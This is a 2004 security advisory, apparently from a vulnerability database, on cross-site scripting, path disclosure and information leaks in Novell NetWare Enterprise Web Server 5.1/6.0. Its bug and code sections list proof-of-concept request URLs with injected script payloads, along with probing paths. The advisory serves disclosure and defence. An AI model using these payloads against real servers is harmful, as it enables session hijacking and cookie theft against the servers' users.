NetWare-Enterprise-Web-Server/5.1/6.0 Multiple Vulnerabilities

2004-01-26T00:00:00
ID SECURITYVULNS:DOC:5674
Type securityvulns
Reporter Securityvulns
Modified 2004-01-26T00:00:00

Description

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Software: Novell Netware Vendor: http://www.Novell.com Versions: NetWare-Enterprise-Web-Server/5.1/6.0 Platforms: Windows Bug: Multiple Vulnerabilities Risk: Medium Exploitation: Remote with browser Date: 6 Jan 2004 Author: Rafel Ivgi, The-Insider e-mail: the_insider@mail.com web: http://theinsider.deep-ice.com

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1) Introduction 2) Bug 3) The Code

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

=============== 1) Introduction ===============

Novell NetWare-Enterprise-Web-Server is a strong and steady webserver. It is used by big company's and some governments.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

====== 2) Bug ======

Cross Site Scripting and Local Path Disclosure Vulnerabillity:


The Vulnerabillity is Cross Site Scripting type. If an attacker will request the one of following url from the server

http://<host>/perl/\<sCRIPT>alert("d")</sCRIPT>\.pl - Cross Site Scripting Vulnerabillity http://<host>/perl/<script>alert('XSS')</script>.pl - Cross Site Scripting Vulnerabillity http://<host>/perl/\/.pl
- cgi2perl running on the server contains Local Path Disclosure http://<host>/servlet/webacc?User.id="><script>alert('XSS')</script> - Cross Site Scripting Vulnerabillity - Unfiltered Parameters http://<host>/servlet/webacc?User.id=&User.password=&User.context=cwqlNomoqd Oq&User.interface=frames&error=login&merge=webacc&action=User.Login&GWAP.ver sion="><script>alert('XSS')</script> - Cross Site Scripting Vulnerabillity - Unfiltered Parameters http://<host>/nsn/"<script%20language=vbscript>msgbox%20sadas</script>".bas - Cross Site Scripting Vulnerabillity

If all of these circumstances are met, an attacker may be able to exploit this issue via a malicious link containing arbitrary HTML and script code as part of the hostname. When the malicious link is clicked by an unsuspecting user, the attacker-supplied HTML and script code will be executed by their web client. This will occur because the server will echo back the malicious hostname supplied in the client's request, without sufficiently escaping HTML and script code.

Attacks of this nature may make it possible for attackers to manipulate web content or to steal cookie-based authentication credentials. It may be possible to take arbitrary actions as the victim user.

Internal IP Disclosure: - and much more server info...

http://<host>/examples/jsp/snp/snoop.jsp http://<host>/servlet/SnoopServlet http://<host>/nsn/env.bas http://<host>/lcgi/lcgitest.nlm

Load .htt files:

http://<host>/servlet/webacc?User.id=&User.password=&User.context=cwqlNomoqd Oq&User.interface=frames&error=c:\windows\web\folder

Directory Listing:

/com/ /com/novell/ /com/novell/webaccess /ns-icons/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

=========== 3) The Code ===========

http://<host>/perl/\<sCRIPT>alert("d")</sCRIPT>\.pl - Cross Site Scripting Vulnerabillity http://<host>/perl/<script>alert('XSS')</script>.pl - Cross Site Scripting Vulnerabillity http://<host>/perl/\/.pl
- cgi2perl running on the server contains Local Path Disclosure http://<host>/servlet/webacc?User.id="><script>alert('XSS')</script> - Cross Site Scripting Vulnerabillity - Unfiltered Parameters http://<host>/servlet/webacc?User.id=&User.password=&User.context=cwqlNomoqd Oq&User.interface=frames&error=login&merge=webacc&action=User.Login&GWAP.ver sion="><script>alert('XSS')</script> - Cross Site Scripting Vulnerabillity - Unfiltered Parameters http://<host>/examples/jsp/snp/snoop.jsp - Internal IP Disclosure http://<host>/servlet/webacc?User.id=&User.password=&User.context=cwqlNomoqd Oq&User.interface=frames&error=<htt file> - Load .htt files http://<host>/servlet/SnoopServlet - Internal IP Disclosure http://<host>/nsn/"<script%20language=vbscript>msgbox%20sadas</script>".bas - Cross Site Scripting Vulnerabillity

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

A lot of thanks to Stuart Moore:


SecurityTracker.com SecurityGlobal.net LLC smoore@securityglobal.net +1 301 495 5930 voice +1 413 691 4346 fax


Without his help this wouldn't have been published.


Rafel Ivgi, The-Insider http://theinsider.deep-ice.com

"Things that are unlikeable, are NOT impossible."